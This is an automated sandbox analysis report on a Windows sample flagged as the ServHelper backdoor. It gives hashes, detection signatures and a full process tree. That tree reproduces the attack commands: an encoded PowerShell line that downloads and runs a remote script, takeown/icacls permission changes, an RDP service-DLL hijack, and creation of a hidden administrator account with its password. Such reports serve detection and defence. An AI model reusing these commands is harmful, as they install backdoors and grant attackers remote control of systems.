Analysis
-
max time kernel
138s -
max time network
159s -
platform
windows7_x64 -
resource
win7v20210408 -
submitted
11-08-2021 07:36
Static task
static1
Behavioral task
behavioral1
Sample
bfe0ac25eeeb759f7c8e06229c7313a2.exe
Resource
win7v20210408
Behavioral task
behavioral2
Sample
bfe0ac25eeeb759f7c8e06229c7313a2.exe
Resource
win10v20210410
General
-
Target
bfe0ac25eeeb759f7c8e06229c7313a2.exe
-
Size
5.9MB
-
MD5
bfe0ac25eeeb759f7c8e06229c7313a2
-
SHA1
199c1fbd29f9ec98b83464763dac63ef80998bb3
-
SHA256
be9c5e5ce6d4544e6bddbd47c26873fe0c33414086824b1d4968a638184a8a7c
-
SHA512
a0f3b477de1603d7e032608692857a4865059ba61ae1276334f281970a1484a6c81463fba2a2bbc9821c016e06e206d621fdb97e8743fc60e3515fba88997a72
Malware Config
Extracted
https://raw.githubusercontent.com/sqlitey/sqlite/master/speed.ps1
Signatures
-
ServHelper
ServHelper is a backdoor written in Delphi and is associated with the hacking group TA505.
-
suricata: ET MALWARE ServHelper CnC Inital Checkin
suricata: ET MALWARE ServHelper CnC Inital Checkin
-
Grants admin privileges 1 TTPs
Uses net.exe to modify the user's privileges.
-
Blocklisted process makes network request 1 IoCs
Processes:
powershell.exeflow pid process 13 364 powershell.exe -
Modifies RDP port number used by Windows 1 TTPs
-
Possible privilege escalation attempt 8 IoCs
Processes:
icacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exetakeown.exeicacls.exepid process 1596 icacls.exe 1652 icacls.exe 304 icacls.exe 364 icacls.exe 1508 icacls.exe 1896 icacls.exe 1660 takeown.exe 1852 icacls.exe -
Sets DLL path for service in the registry 2 TTPs
-
Processes:
resource yara_rule \Windows\Branding\mediasrv.png upx \Windows\Branding\mediasvc.png upx -
Loads dropped DLL 2 IoCs
Processes:
pid process 1660 1660 -
Modifies file permissions 1 TTPs 8 IoCs
Processes:
icacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exetakeown.exeicacls.exepid process 1596 icacls.exe 1652 icacls.exe 304 icacls.exe 364 icacls.exe 1508 icacls.exe 1896 icacls.exe 1660 takeown.exe 1852 icacls.exe -
Drops file in System32 directory 1 IoCs
Processes:
powershell.exedescription ioc process File created C:\Windows\system32\rfxvmt.dll powershell.exe -
Drops file in Windows directory 21 IoCs
Processes:
powershell.exepowershell.exedescription ioc process File created C:\Windows\branding\mediasvc.png powershell.exe File opened for modification C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_908d39ce-24b6-422d-b13c-1cd620ffe39a powershell.exe File opened for modification C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_54f86504-967f-47ba-8a81-52faa6c5b4c3 powershell.exe File opened for modification C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_0496d9a4-e54c-4347-8002-3f181ea1c903 powershell.exe File opened for modification C:\Windows\branding\wupsvc.jpg powershell.exe File opened for modification C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex powershell.exe File opened for modification C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_35772917-17dd-4b06-85c2-c2e3d36dc898 powershell.exe File opened for modification C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_b7715f61-688a-488b-a83c-db9fbbd70e7e powershell.exe File opened for modification C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_354611f8-ce69-447b-b662-a8186d10bbc3 powershell.exe File opened for modification C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_4b72bc87-8380-42cd-9d4d-547942f6041f powershell.exe File opened for modification C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_27cb5a9a-b333-4ada-9b75-556eab32d099 powershell.exe File created C:\Windows\branding\wupsvc.jpg powershell.exe File opened for modification C:\Windows\branding\Basebrd powershell.exe File opened for modification C:\Windows\branding\mediasvc.png powershell.exe File opened for modification C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_e65ec103-2669-4c30-b9d2-f69cf8116b4b powershell.exe File opened for modification C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_de533a78-9572-45c8-842a-cdb660a1681e powershell.exe File opened for modification C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_f99ea740-6a9c-4120-bf17-7f8d9541ca3c powershell.exe File created C:\Windows\branding\mediasrv.png powershell.exe File opened for modification C:\Windows\branding\ShellBrd powershell.exe File opened for modification C:\Windows\branding\mediasrv.png powershell.exe File created C:\Windows\ServiceProfiles\NetworkService\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\49YMOHYACZO61Z40T6ZG.temp powershell.exe -
Modifies data under HKEY_USERS 4 IoCs
Processes:
powershell.exeWMIC.exeWMIC.exedescription ioc process Set value (data) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Explorer\StartPage\StartMenu_Start_Time = b0e7e004958ed701 powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ WMIC.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ WMIC.exe Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage powershell.exe -
Modifies registry key 1 TTPs 1 IoCs
-
Processes:
bfe0ac25eeeb759f7c8e06229c7313a2.exedescription ioc process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13 bfe0ac25eeeb759f7c8e06229c7313a2.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13\Blob = 040000000100000010000000410352dc0ff7501b16f0028eba6f45c50f00000001000000140000005bcaa1c2780f0bcb5a90770451d96f38963f012d0b000000010000001e000000440053005400200052006f006f0074002000430041002000580033000000090000000100000016000000301406082b0601050507030406082b06010505070301140000000100000014000000c4a7b1a47b2c71fadbe14b9075ffc415608589101d00000001000000100000004558d512eecb27464920897de7b66053030000000100000014000000dac9024f54d8f6df94935fb1732638ca6ad77c131900000001000000100000006cf252fec3e8f20996de5d4dd9aef42420000000010000004e0300003082034a30820232a003020102021044afb080d6a327ba893039862ef8406b300d06092a864886f70d0101050500303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f74204341205833301e170d3030303933303231313231395a170d3231303933303134303131355a303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f7420434120583330820122300d06092a864886f70d01010105000382010f003082010a0282010100dfafe99750088357b4cc6265f69082ecc7d32c6b30ca5becd9c37dc740c118148be0e83376492ae33f214993ac4e0eaf3e48cb65eefcd3210f65d22ad9328f8ce5f777b0127bb595c089a3a9baed732e7a0c063283a27e8a1430cd11a0e12a38b9790a31fd50bd8065dfb7516383c8e28861ea4b6181ec526bb9a2e24b1a289f48a39e0cda098e3e172e1edd20df5bc62a8aab2ebd70adc50b1a25907472c57b6aab34d63089ffe568137b540bc8d6aeec5a9c921e3d64b38cc6dfbfc94170ec1672d526ec38553943d0fcfd185c40f197ebd59a9b8d1dbada25b9c6d8dfc115023aabda6ef13e2ef55c089c3cd68369e4109b192ab62957e3e53d9b9ff0025d0203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020106301d0603551d0e04160414c4a7b1a47b2c71fadbe14b9075ffc41560858910300d06092a864886f70d01010505000382010100a31a2c9b17005ca91eee2866373abf83c73f4bc309a095205de3d95944d23e0d3ebd8a4ba0741fce10829c741a1d7e981addcb134bb32044e491e9ccfc7da5db6ae5fee6fde04eddb7003ab57049aff2e5eb02f1d1028b19cb943a5e48c4181e58195f1e025af00cf1b1ada9dc59868b6ee991f586cafab96633aa595bcee2a7167347cb2bcc99b03748cfe3564bf5cf0f0c723287c6f044bb53726d43f526489a5267b758abfe67767178db0da256141339243185a2a8025a3047e1dd5007bc02099000eb6463609b16bc88c912e6d27d918bf93d328d65b4e97cb15776eac5b62839bf15651cc8f677966a0a8d770bd8910b048e07db29b60aee9d82353510 bfe0ac25eeeb759f7c8e06229c7313a2.exe -
Runs net.exe
-
Suspicious behavior: EnumeratesProcesses 13 IoCs
Processes:
powershell.exepowershell.exepowershell.exepowershell.exepowershell.exepid process 1808 powershell.exe 1808 powershell.exe 880 powershell.exe 880 powershell.exe 1148 powershell.exe 1148 powershell.exe 1684 powershell.exe 1684 powershell.exe 1808 powershell.exe 1808 powershell.exe 1808 powershell.exe 364 powershell.exe 364 powershell.exe -
Suspicious behavior: LoadsDriver 5 IoCs
Processes:
pid process 468 1660 1660 1660 1660 -
Suspicious use of AdjustPrivilegeToken 19 IoCs
Processes:
bfe0ac25eeeb759f7c8e06229c7313a2.exepowershell.exepowershell.exepowershell.exepowershell.exeicacls.exeWMIC.exeWMIC.exepowershell.exedescription pid process Token: SeDebugPrivilege 2016 bfe0ac25eeeb759f7c8e06229c7313a2.exe Token: SeDebugPrivilege 1808 powershell.exe Token: SeDebugPrivilege 880 powershell.exe Token: SeDebugPrivilege 1148 powershell.exe Token: SeDebugPrivilege 1684 powershell.exe Token: SeRestorePrivilege 1596 icacls.exe Token: SeAssignPrimaryTokenPrivilege 1600 WMIC.exe Token: SeIncreaseQuotaPrivilege 1600 WMIC.exe Token: SeAuditPrivilege 1600 WMIC.exe Token: SeAssignPrimaryTokenPrivilege 1600 WMIC.exe Token: SeIncreaseQuotaPrivilege 1600 WMIC.exe Token: SeAuditPrivilege 1600 WMIC.exe Token: SeAssignPrimaryTokenPrivilege 636 WMIC.exe Token: SeIncreaseQuotaPrivilege 636 WMIC.exe Token: SeAuditPrivilege 636 WMIC.exe Token: SeAssignPrimaryTokenPrivilege 636 WMIC.exe Token: SeIncreaseQuotaPrivilege 636 WMIC.exe Token: SeAuditPrivilege 636 WMIC.exe Token: SeDebugPrivilege 364 powershell.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
bfe0ac25eeeb759f7c8e06229c7313a2.exepowershell.execsc.exenet.execmd.execmd.exedescription pid process target process PID 2016 wrote to memory of 1808 2016 bfe0ac25eeeb759f7c8e06229c7313a2.exe powershell.exe PID 2016 wrote to memory of 1808 2016 bfe0ac25eeeb759f7c8e06229c7313a2.exe powershell.exe PID 2016 wrote to memory of 1808 2016 bfe0ac25eeeb759f7c8e06229c7313a2.exe powershell.exe PID 1808 wrote to memory of 616 1808 powershell.exe csc.exe PID 1808 wrote to memory of 616 1808 powershell.exe csc.exe PID 1808 wrote to memory of 616 1808 powershell.exe csc.exe PID 616 wrote to memory of 824 616 csc.exe cvtres.exe PID 616 wrote to memory of 824 616 csc.exe cvtres.exe PID 616 wrote to memory of 824 616 csc.exe cvtres.exe PID 1808 wrote to memory of 880 1808 powershell.exe powershell.exe PID 1808 wrote to memory of 880 1808 powershell.exe powershell.exe PID 1808 wrote to memory of 880 1808 powershell.exe powershell.exe PID 1808 wrote to memory of 1148 1808 powershell.exe powershell.exe PID 1808 wrote to memory of 1148 1808 powershell.exe powershell.exe PID 1808 wrote to memory of 1148 1808 powershell.exe powershell.exe PID 1808 wrote to memory of 1684 1808 powershell.exe powershell.exe PID 1808 wrote to memory of 1684 1808 powershell.exe powershell.exe PID 1808 wrote to memory of 1684 1808 powershell.exe powershell.exe PID 1808 wrote to memory of 1660 1808 powershell.exe takeown.exe PID 1808 wrote to memory of 1660 1808 powershell.exe takeown.exe PID 1808 wrote to memory of 1660 1808 powershell.exe takeown.exe PID 1808 wrote to memory of 1852 1808 powershell.exe icacls.exe PID 1808 wrote to memory of 1852 1808 powershell.exe icacls.exe PID 1808 wrote to memory of 1852 1808 powershell.exe icacls.exe PID 1808 wrote to memory of 1596 1808 powershell.exe icacls.exe PID 1808 wrote to memory of 1596 1808 powershell.exe icacls.exe PID 1808 wrote to memory of 1596 1808 powershell.exe icacls.exe PID 1808 wrote to memory of 1652 1808 powershell.exe icacls.exe PID 1808 wrote to memory of 1652 1808 powershell.exe icacls.exe PID 1808 wrote to memory of 1652 1808 powershell.exe icacls.exe PID 1808 wrote to memory of 304 1808 powershell.exe icacls.exe PID 1808 wrote to memory of 304 1808 powershell.exe icacls.exe PID 1808 wrote to memory of 304 1808 powershell.exe icacls.exe PID 1808 wrote to memory of 364 1808 powershell.exe icacls.exe PID 1808 wrote to memory of 364 1808 powershell.exe icacls.exe PID 1808 wrote to memory of 364 1808 powershell.exe icacls.exe PID 1808 wrote to memory of 1508 1808 powershell.exe icacls.exe PID 1808 wrote to memory of 1508 1808 powershell.exe icacls.exe PID 1808 wrote to memory of 1508 1808 powershell.exe icacls.exe PID 1808 wrote to memory of 1896 1808 powershell.exe icacls.exe PID 1808 wrote to memory of 1896 1808 powershell.exe icacls.exe PID 1808 wrote to memory of 1896 1808 powershell.exe icacls.exe PID 1808 wrote to memory of 960 1808 powershell.exe reg.exe PID 1808 wrote to memory of 960 1808 powershell.exe reg.exe PID 1808 wrote to memory of 960 1808 powershell.exe reg.exe PID 1808 wrote to memory of 956 1808 powershell.exe reg.exe PID 1808 wrote to memory of 956 1808 powershell.exe reg.exe PID 1808 wrote to memory of 956 1808 powershell.exe reg.exe PID 1808 wrote to memory of 1252 1808 powershell.exe reg.exe PID 1808 wrote to memory of 1252 1808 powershell.exe reg.exe PID 1808 wrote to memory of 1252 1808 powershell.exe reg.exe PID 1808 wrote to memory of 1348 1808 powershell.exe net.exe PID 1808 wrote to memory of 1348 1808 powershell.exe net.exe PID 1808 wrote to memory of 1348 1808 powershell.exe net.exe PID 1348 wrote to memory of 1160 1348 net.exe net1.exe PID 1348 wrote to memory of 1160 1348 net.exe net1.exe PID 1348 wrote to memory of 1160 1348 net.exe net1.exe PID 1808 wrote to memory of 572 1808 powershell.exe cmd.exe PID 1808 wrote to memory of 572 1808 powershell.exe cmd.exe PID 1808 wrote to memory of 572 1808 powershell.exe cmd.exe PID 572 wrote to memory of 1788 572 cmd.exe cmd.exe PID 572 wrote to memory of 1788 572 cmd.exe cmd.exe PID 572 wrote to memory of 1788 572 cmd.exe cmd.exe PID 1788 wrote to memory of 328 1788 cmd.exe net.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\bfe0ac25eeeb759f7c8e06229c7313a2.exe"C:\Users\Admin\AppData\Local\Temp\bfe0ac25eeeb759f7c8e06229c7313a2.exe"1⤵
- Modifies system certificate store
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2016 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" -ep bypass & 'C:\Users\Admin\AppData\Local\Temp\\ready.ps1'2⤵
- Drops file in System32 directory
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1808 -
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\i0kkpqrr\i0kkpqrr.cmdline"3⤵
- Suspicious use of WriteProcessMemory
PID:616 -
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES3830.tmp" "c:\Users\Admin\AppData\Local\Temp\i0kkpqrr\CSC33BE8908D41844F1B7E2D153036817B.TMP"4⤵PID:824
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 4.0 -s -NoLogo -NoProfile3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:880 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 4.0 -s -NoLogo -NoProfile3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1148 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 4.0 -s -NoLogo -NoProfile3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1684 -
C:\Windows\system32\takeown.exe"C:\Windows\system32\takeown.exe" /A /F rfxvmt.dll3⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:1660 -
C:\Windows\system32\icacls.exe"C:\Windows\system32\icacls.exe" rfxvmt.dll /inheritance:d3⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:1852 -
C:\Windows\system32\icacls.exe"C:\Windows\system32\icacls.exe" rfxvmt.dll /setowner "NT SERVICE\TrustedInstaller"3⤵
- Possible privilege escalation attempt
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:1596 -
C:\Windows\system32\icacls.exe"C:\Windows\system32\icacls.exe" rfxvmt.dll /grant "NT SERVICE\TrustedInstaller:F"3⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:1652 -
C:\Windows\system32\icacls.exe"C:\Windows\system32\icacls.exe" rfxvmt.dll /remove "NT AUTHORITY\SYSTEM"3⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:304 -
C:\Windows\system32\icacls.exe"C:\Windows\system32\icacls.exe" rfxvmt.dll /grant "NT AUTHORITY\SYSTEM:RX"3⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:364 -
C:\Windows\system32\icacls.exe"C:\Windows\system32\icacls.exe" rfxvmt.dll /remove BUILTIN\Administrators3⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:1508 -
C:\Windows\system32\icacls.exe"C:\Windows\system32\icacls.exe" rfxvmt.dll /grant BUILTIN\Administrators:RX3⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:1896 -
C:\Windows\system32\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d 0x1C21 /f3⤵PID:960
-
C:\Windows\system32\reg.exe"C:\Windows\system32\reg.exe" add HKLM\system\currentcontrolset\services\TermService\parameters /v ServiceDLL /t REG_EXPAND_SZ /d C:\Windows\branding\mediasrv.png /f3⤵
- Modifies registry key
PID:956 -
C:\Windows\system32\reg.exe"C:\Windows\system32\reg.exe" add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services" /v fEnableWddmDriver /t reg_dword /d 0 /f3⤵PID:1252
-
C:\Windows\system32\net.exe"C:\Windows\system32\net.exe" localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add3⤵
- Suspicious use of WriteProcessMemory
PID:1348 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add4⤵PID:1160
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c cmd /c net start rdpdr3⤵
- Suspicious use of WriteProcessMemory
PID:572 -
C:\Windows\system32\cmd.execmd /c net start rdpdr4⤵
- Suspicious use of WriteProcessMemory
PID:1788 -
C:\Windows\system32\net.exenet start rdpdr5⤵PID:328
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 start rdpdr6⤵PID:1820
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c cmd /c net start TermService3⤵PID:824
-
C:\Windows\system32\cmd.execmd /c net start TermService4⤵PID:1148
-
C:\Windows\system32\net.exenet start TermService5⤵PID:556
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 start TermService6⤵PID:952
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c del %temp%\*.ps1 /f3⤵PID:1148
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c del %temp%\*.txt /f3⤵PID:824
-
C:\Windows\System32\cmd.execmd /C net.exe user WgaUtilAcc 000000 /del1⤵PID:1316
-
C:\Windows\system32\net.exenet.exe user WgaUtilAcc 000000 /del2⤵PID:1692
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user WgaUtilAcc 000000 /del3⤵PID:932
-
C:\Windows\System32\cmd.execmd /C net.exe user WgaUtilAcc Ooom35gS /add1⤵PID:2008
-
C:\Windows\system32\net.exenet.exe user WgaUtilAcc Ooom35gS /add2⤵PID:880
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user WgaUtilAcc Ooom35gS /add3⤵PID:1828
-
C:\Windows\System32\cmd.execmd /C net.exe LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD1⤵PID:1104
-
C:\Windows\system32\net.exenet.exe LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD2⤵PID:772
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD3⤵PID:328
-
C:\Windows\System32\cmd.execmd /C net.exe LOCALGROUP "Remote Desktop Users" QWOCTUPM$ /ADD1⤵PID:1904
-
C:\Windows\system32\net.exenet.exe LOCALGROUP "Remote Desktop Users" QWOCTUPM$ /ADD2⤵PID:304
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" QWOCTUPM$ /ADD3⤵PID:1656
-
C:\Windows\System32\cmd.execmd /C net.exe LOCALGROUP "Administrators" WgaUtilAcc /ADD1⤵PID:636
-
C:\Windows\system32\net.exenet.exe LOCALGROUP "Administrators" WgaUtilAcc /ADD2⤵PID:1536
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 LOCALGROUP "Administrators" WgaUtilAcc /ADD3⤵PID:1364
-
C:\Windows\System32\cmd.execmd /C net.exe user WgaUtilAcc Ooom35gS1⤵PID:1644
-
C:\Windows\system32\net.exenet.exe user WgaUtilAcc Ooom35gS2⤵PID:1668
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user WgaUtilAcc Ooom35gS3⤵PID:1736
-
C:\Windows\System32\cmd.execmd.exe /C wmic path win32_VideoController get name1⤵PID:2024
-
C:\Windows\System32\Wbem\WMIC.exewmic path win32_VideoController get name2⤵
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:1600
-
C:\Windows\System32\cmd.execmd.exe /C wmic CPU get NAME1⤵PID:1560
-
C:\Windows\System32\Wbem\WMIC.exewmic CPU get NAME2⤵
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:636
-
C:\Windows\System32\cmd.execmd.exe /C cmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA1⤵PID:1840
-
C:\Windows\system32\cmd.execmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA2⤵PID:1644
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA3⤵
- Blocklisted process makes network request
- Drops file in Windows directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:364
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_5b996172-3ed0-4836-9a73-f3ea75406189
MD5d89968acfbd0cd60b51df04860d99896
SHA1b3c29916ccb81ce98f95bbf3aa8a73de16298b29
SHA2561020cc7c929cd5a4e68ccb40353ca76f427df363f0d95e456eb79db039bdb2b9
SHA512b0e886cce598371b59131fed1535e220c798691bad93ef9474ba440066f5a6bd77a60966604b7a5ff6298b2e200c9dd0c8f9f04aff208b2af423480ead4e8842
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_92e95bc8-691b-4b62-92ce-03265d89f73f
MD56f0d509e28be1af95ba237d4f43adab4
SHA1c665febe79e435843553bee86a6cea731ce6c5e4
SHA256f545be30e70cd6e1b70e98239219735f6b61c25712720bb1e1738f02be900e7e
SHA5128dbadc140fd18eb16e2a282e3a0a895299b124850e7b9454a3f24e1cc1c090c5bebfbff5062e8807369e84ed7359e0854722cfd45b9a63681f9fea8c97fab797
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_9672c690-e580-42f7-a6ae-f1b0aa8430ad
MD57f79b990cb5ed648f9e583fe35527aa7
SHA171b177b48c8bd745ef02c2affad79ca222da7c33
SHA256080ec69d3f2abac629a0bdc314f150ad42a9a1b0a031b1d5c7b5b80051c48683
SHA51220926edf7f0b990da4bd8d7ba91bd8bf7b952b75080f687afa7197a91777604688303d38b4a0a7240b558c23f2e0cd927d3590765109f8be0551f5eb050eafda
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_b11c9179-2eac-4d5e-a505-b450a8b21b81
MD52d5cd190b5db0620cd62e3cd6ba1dcd3
SHA1ff4f229f4fbacccdf11d98c04ba756bda80aac7a
SHA256ab9aee31b3411bcc5a5fb51e9375777cca79cfb3a532d93ddd98a5673c60571d
SHA512edb2a46f3ee33b48f8fe0b548c1e7940978d0e4ac90d5090807d8b5c8b1320217e5d66990b1d0a85546acbbaf9b601590d35de87de234da8eafd60d12fdce610
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_b2cf78f0-e6a2-479b-b893-4f58d12359aa
MD5e5b3ba61c3cf07deda462c9b27eb4166
SHA1b324dad73048be6e27467315f82b7a5c1438a1f9
SHA256b84fae85b6203a0c8c9db3ba3c050c97d6700e5c9ae27dd31c103ec1bbb02925
SHA512a5936a098db2e8c0d0231fd97d73cc996ad99897fd64f0e5c6761c44b8eb2db2bff477843d326503e6027c1113da0e8e35f4227195a3cf505c5a374ebe0f67fc
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_b7409fb2-414b-4594-b9d4-a8383316e499
MD5a70ee38af4bb2b5ed3eeb7cbd1a12fa3
SHA181dbaeae4b0f9e1adc0a1e3d6d76a12396498ba9
SHA256dd2f41f92f19c3fe031bdf5da68ab06768e26762d0077b290cd0094df1d5d58d
SHA5128c69a5300c7545c5c4b25a0594e6813b6b7a85b5f3ae7fc5464b4074fe6f50b2f49d31cacf19bc20a02bb8e237656f1b9b2a3f6a3953e3a8478ca2adc154e0e3
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_d0ec6398-9e82-40e2-8975-07d12432fae1
MD5faa37917b36371249ac9fcf93317bf97
SHA1a0f0d84d58ee518d33a69f5f1c343aa921c8ffd4
